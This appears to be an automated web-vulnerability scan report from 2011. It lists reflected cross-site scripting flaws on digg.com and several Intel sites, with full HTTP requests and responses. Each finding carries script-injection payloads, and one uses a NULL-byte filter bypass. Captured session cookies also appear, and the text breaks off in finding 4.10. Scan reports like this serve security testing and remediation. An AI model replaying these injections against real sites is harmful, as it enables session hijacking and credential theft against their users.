Content-Length: 225
Content-Type: text/plain; charset=UTF-8

The URL has moved <a href="http://newsroom.intel.com/community/intel_newsroom/blog/2011/02/01/intel-increases-renewable-energy-credit-purchase-to-25-billion-kilowatt-hours?cid=rss-258152-c1-2641317044
...[SNIP]...

4. Cross-site scripting (reflected)  previous  next
There are 99 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


4.1. http://digg.com/submit [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00ddf0f"><script>alert(1)</script>ae77e5693f was submitted in the REST URL parameter 1. This input was echoed as ddf0f"><script>alert(1)</script>ae77e5693f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /submit%00ddf0f"><script>alert(1)</script>ae77e5693f?url= HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:17:48 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=1458898097449992448%3A180; expires=Sun, 06-Feb-2011 23:17:48 GMT; path=/; domain=digg.com
Set-Cookie: d=a6fbe359887d5db537b9b4c69ceaa445e8d94eb57157cfe93fc4c3a5ea808a45; expires=Fri, 05-Feb-2021 09:25:28 GMT; path=/; domain=.digg.com
X-Digg-Time: D=186622 10.2.128.255
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 5819

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>error_ - Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/submit%00ddf0f"><script>alert(1)</script>ae77e5693f?url=.rss">
...[SNIP]...

4.2. http://inside.intel.com/LOPFeedMashup [SN parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://inside.intel.com
Path:   /LOPFeedMashup

Issue detail

The value of the SN request parameter is copied into the HTML document as plain text between tags. The payload ef091<script>alert(1)</script>3dacfb292a3 was submitted in the SN parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /LOPFeedMashup?ON=runMashup&SN=LOPMASHUP09ef091<script>alert(1)</script>3dacfb292a3&STARTINDEX=1&COUNT=3 HTTP/1.1
Host: inside.intel.com
Proxy-Connection: keep-alive
Referer: http://inside.intel.com/static/portal/FeedFrame.htm
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; cf=0; countrylang=United%20States%20-%20English; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_cc=true; s_lv=1296947643351; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; __utmv=; __utma=1.167981993.1296947562.1296947562.1296947562.1; __utmc=1; __utmb=1.2.10.1296947562; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel,http%3A//www.intel.com/about/corporateresponsibility/index.htm%3Fiid%3Dsubhdr+cr:Intel%20Corporate%20Responsibility%20-%20With%20Leadership%20Comes%20Responsibility

Response

HTTP/1.1 401 Unauthorized
Server: Apache
Vary: Accept-Encoding
CacheHit: D=369978 t=1296947581195723
Content-Type: text/plain; charset=UTF-8
Cache-Control: max-age=43158
Expires: Sun, 06 Feb 2011 11:13:31 GMT
Date: Sat, 05 Feb 2011 23:14:13 GMT
Connection: close
Content-Length: 311

Error execution Mashup Script : com.jackbe.jbp.jems.moe.runtime.JEMSException: Service not found : LOPMASHUP09ef091<script>alert(1)</script>3dacfb292a3 - Unable to find resource (LOPMASHUP09ef091<script>
...[SNIP]...

4.3. http://inside.intel.com/LOPSPFeedMashup [SN1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://inside.intel.com
Path:   /LOPSPFeedMashup

Issue detail

The value of the SN1 request parameter is copied into the HTML document as plain text between tags. The payload 1d7b9<script>alert(1)</script>6803e5c75c1 was submitted in the SN1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /LOPSPFeedMashup?ON=runMashup&SN1=LOPMASHUP111d7b9<script>alert(1)</script>6803e5c75c1&SN2=LOPMASHUP07A&SN3=LOPMASHUP07B&SN4=LOPMASHUP07C&STARTINDEX=1&COUNT=10&SIP=keyword= HTTP/1.1
Host: inside.intel.com
Proxy-Connection: keep-alive
Referer: http://inside.intel.com/static/portal/FeedFrame.htm
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; cf=0; countrylang=United%20States%20-%20English; intelresearchSTGref=NONE; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_cc=true; s_lv=1296947561739; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/index.htm; s_sq=%5B%5BB%5D%5D; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmv=; __utma=1.167981993.1296947562.1296947562.1296947562.1; __utmc=1; __utmb=1.1.10.1296947562; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel

Response

HTTP/1.1 401 Unauthorized
Server: Apache
Vary: Accept-Encoding
CacheHit: D=378739 t=1296948033239822
Content-Type: text/plain; charset=UTF-8
Cache-Control: max-age=43141
Expires: Sun, 06 Feb 2011 11:20:47 GMT
Date: Sat, 05 Feb 2011 23:21:46 GMT
Connection: close
Content-Length: 311

Error execution Mashup Script : com.jackbe.jbp.jems.moe.runtime.JEMSException: Service not found : LOPMASHUP111d7b9<script>alert(1)</script>6803e5c75c1 - Unable to find resource (LOPMASHUP111d7b9<script>
...[SNIP]...

4.4. http://inside.intel.com/LOPSPFeedMashup [SN2 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://inside.intel.com
Path:   /LOPSPFeedMashup

Issue detail

The value of the SN2 request parameter is copied into the HTML document as plain text between tags. The payload 85e7a<script>alert(1)</script>3d9a1e6322b was submitted in the SN2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /LOPSPFeedMashup?ON=runMashup&SN1=LOPMASHUP11&SN2=LOPMASHUP07A85e7a<script>alert(1)</script>3d9a1e6322b&SN3=LOPMASHUP07B&SN4=LOPMASHUP07C&STARTINDEX=1&COUNT=10&SIP=keyword= HTTP/1.1
Host: inside.intel.com
Proxy-Connection: keep-alive
Referer: http://inside.intel.com/static/portal/FeedFrame.htm
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; cf=0; countrylang=United%20States%20-%20English; intelresearchSTGref=NONE; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_cc=true; s_lv=1296947561739; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/index.htm; s_sq=%5B%5BB%5D%5D; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmv=; __utma=1.167981993.1296947562.1296947562.1296947562.1; __utmc=1; __utmb=1.1.10.1296947562; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel

Response

HTTP/1.1 401 Unauthorized
Server: Apache
Vary: Accept-Encoding
CacheHit: D=385035 t=1296948034236978
Content-Type: text/plain; charset=UTF-8
Cache-Control: max-age=43200
Expires: Sun, 06 Feb 2011 11:21:47 GMT
Date: Sat, 05 Feb 2011 23:21:47 GMT
Connection: close
Content-Length: 313

Error execution Mashup Script : com.jackbe.jbp.jems.moe.runtime.JEMSException: Service not found : LOPMASHUP07A85e7a<script>alert(1)</script>3d9a1e6322b - Unable to find resource (LOPMASHUP07A85e7a<script>
...[SNIP]...

4.5. http://inside.intel.com/LOPSPFeedMashup [SN3 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://inside.intel.com
Path:   /LOPSPFeedMashup

Issue detail

The value of the SN3 request parameter is copied into the HTML document as plain text between tags. The payload 74c09<script>alert(1)</script>e0e02b85dc5 was submitted in the SN3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /LOPSPFeedMashup?ON=runMashup&SN1=LOPMASHUP11&SN2=LOPMASHUP07A&SN3=LOPMASHUP07B74c09<script>alert(1)</script>e0e02b85dc5&SN4=LOPMASHUP07C&STARTINDEX=1&COUNT=10&SIP=keyword= HTTP/1.1
Host: inside.intel.com
Proxy-Connection: keep-alive
Referer: http://inside.intel.com/static/portal/FeedFrame.htm
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; cf=0; countrylang=United%20States%20-%20English; intelresearchSTGref=NONE; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_cc=true; s_lv=1296947561739; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/index.htm; s_sq=%5B%5BB%5D%5D; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmv=; __utma=1.167981993.1296947562.1296947562.1296947562.1; __utmc=1; __utmb=1.1.10.1296947562; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel

Response

HTTP/1.1 401 Unauthorized
Server: Apache
Vary: Accept-Encoding
CacheHit: D=412655 t=1296948035565396
Content-Type: text/plain; charset=UTF-8
Cache-Control: max-age=43200
Expires: Sun, 06 Feb 2011 11:21:48 GMT
Date: Sat, 05 Feb 2011 23:21:48 GMT
Connection: close
Content-Length: 313

Error execution Mashup Script : com.jackbe.jbp.jems.moe.runtime.JEMSException: Service not found : LOPMASHUP07B74c09<script>alert(1)</script>e0e02b85dc5 - Unable to find resource (LOPMASHUP07B74c09<script>
...[SNIP]...

4.6. http://itcenter.intel.com/ResourceLibrary [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://itcenter.intel.com
Path:   /ResourceLibrary

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4b801'><script>alert(1)</script>7e58a74ceab was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ResourceLibrary?4b801'><script>alert(1)</script>7e58a74ceab=1 HTTP/1.1
Host: itcenter.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sat, 05 Feb 2011 23:22:43 GMT
Connection: close
Content-Length: 71611


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en_US" xml:lang="en_US">
<head><met
...[SNIP]...
<a href='http://itcenter.intel.com/ResourceLibrary?4b801'><script>alert(1)</script>7e58a74ceab=1&amp;offset=0' class='single'>
...[SNIP]...

4.7. http://itcenter.intel.com/ResourceLibrary [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://itcenter.intel.com
Path:   /ResourceLibrary

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 76eab"><script>alert(1)</script>9b7cdc81c1f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ResourceLibrary?76eab"><script>alert(1)</script>9b7cdc81c1f=1 HTTP/1.1
Host: itcenter.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sat, 05 Feb 2011 23:22:38 GMT
Connection: close
Content-Length: 71611


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en_US" xml:lang="en_US">
<head><met
...[SNIP]...
<a class="filter" href="http://itcenter.intel.com/ResourceLibrary?76eab"><script>alert(1)</script>9b7cdc81c1f=1&filters=removeAll&offset=0" fcat="itcenterlanguage" fval="en_US">
...[SNIP]...

4.8. http://newsroom.intel.com/render-widget!execute.jspa [idPrefix parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://newsroom.intel.com
Path:   /render-widget!execute.jspa

Issue detail

The value of the idPrefix request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 83dbe'%3balert(1)//e4158e95dd8 was submitted in the idPrefix parameter. This input was echoed as 83dbe';alert(1)//e4158e95dd8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /render-widget!execute.jspa?container=2016&containerType=14&frameID=15017&idPrefix=7llQwi83dbe'%3balert(1)//e4158e95dd8&start=0&range=3&numResults=3&tagSet=-1&widgetID=1002&widgetType=3 HTTP/1.1
Host: newsroom.intel.com
Proxy-Connection: keep-alive
Referer: http://newsroom.intel.com/community/intel_newsroom/?iid=ftr+press
X-Requested-With: XMLHttpRequest
Accept: text/html, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; cf=0; countrylang=United%20States%20-%20English; intelresearchSTGref=NONE; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmv=; __utma=1.167981993.1296947562.1296947562.1296947562.1; __utmc=1; __utmb=1.1.10.1296947562; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; __utmz=174403261.1296947569.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/about/index.htm; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; jive.recentHistory.-1=31342c323031363b; __utma=174403261.410478132.1296947569.1296947569.1296947569.1; __utmc=174403261; __utmb=174403261.3.10.1296947569; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_cc=true; s_lv=1296947627821; s_lv_s=Less%20than%201%20day; gpv_p18=corp%3Anewsroom/community/intel_newsroom/%3Fiid%3Dftr%2Bpress; s_sq=intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA%26intelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:14:14 GMT
Server: Apache
X-JAL: 419
Content-Language: en-US
CacheHit: D=421684 t=1296947654881565
X-JSL: D=421690 t=1296947654881565
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Connection: close


<div class="content-large">

<!-- Parameters that have to be defined before including this ftl-->
<!-- tagSets is a collection of TagSet-->
<!-- Specialize ContentFilterHandler if there is a
...[SNIP]...

$j(document).ready(function() {
// Parse the frameID out of the dom
var parsedFrameID = $j('#jive-recentcontent-content-block-container_7llQwi83dbe';alert(1)//e4158e95dd8').parent().parent().attr('id');
parsedFrameID = parsedFrameID.substring(parsedFrameID.lastIndexOf('_') + 1, parsedFrameID.length);
var pager = new jive.Pager.
...[SNIP]...

4.9. http://newsroom.intel.com/render-widget!execute.jspa [idPrefix parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://newsroom.intel.com
Path:   /render-widget!execute.jspa

Issue detail

The value of the idPrefix request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload e736f%3balert(1)//c5ce5e171d4 was submitted in the idPrefix parameter. This input was echoed as e736f;alert(1)//c5ce5e171d4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /render-widget!execute.jspa?container=2016&containerType=14&frameID=15017&idPrefix=7llQwie736f%3balert(1)//c5ce5e171d4&start=0&range=3&numResults=3&tagSet=-1&widgetID=1002&widgetType=3 HTTP/1.1
Host: newsroom.intel.com
Proxy-Connection: keep-alive
Referer: http://newsroom.intel.com/community/intel_newsroom/?iid=ftr+press
X-Requested-With: XMLHttpRequest
Accept: text/html, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; cf=0; countrylang=United%20States%20-%20English; intelresearchSTGref=NONE; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmv=; __utma=1.167981993.1296947562.1296947562.1296947562.1; __utmc=1; __utmb=1.1.10.1296947562; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; __utmz=174403261.1296947569.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/about/index.htm; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; jive.recentHistory.-1=31342c323031363b; __utma=174403261.410478132.1296947569.1296947569.1296947569.1; __utmc=174403261; __utmb=174403261.3.10.1296947569; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_cc=true; s_lv=1296947627821; s_lv_s=Less%20than%201%20day; gpv_p18=corp%3Anewsroom/community/intel_newsroom/%3Fiid%3Dftr%2Bpress; s_sq=intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA%26intelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:14:35 GMT
Server: Apache
X-JAL: 459
Content-Language: en-US
CacheHit: D=461129 t=1296947675093028
X-JSL: D=461135 t=1296947675093028
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Connection: close


<div class="content-large">

<!-- Parameters that have to be defined before including this ftl-->
<!-- tagSets is a collection of TagSet-->
<!-- Specialize ContentFilterHandler if there is a
...[SNIP]...
idPrefix: '7llQwie736f%3Balert(1)%2F%2Fc5ce5e171d4'
}, false);
if (typeof(ContentFilterHandler_7llQwie736f;alert(1)//c5ce5e171d4) != 'undefined') {
ContentFilterHandler_7llQwie736f;alert(1)//c5ce5e171d4.contentLoader = pager;
}
});


if (typeof(ContentFilte
...[SNIP]...

4.10. http://newsroom.intel.com/render-widget!execute.jspa [idPrefix parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://newsroom.intel.com
Path:   /render-widget!execute.jspa

Issue detail

The value of the idPrefix request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3c39a"><script>alert(1)</script>af3c9d8300 was submitted in the idPrefix parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /render-widget!execute.jspa?container=2016&containerType=14&frameID=15017&idPrefix=7llQwi3c39a"><script>alert(1)</script>af3c9d8300&start=0&range=3&numResults=3&tagSet=-1&widgetID=1002&widgetType=3 HTTP/1.1
Host: newsroom.intel.com
Proxy-Connection: keep-alive
Referer: http://newsroom.intel.com/community/intel_newsroom/?iid=ftr+press
X-Requested-With: XMLHttpRequest
Accept: text/html, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
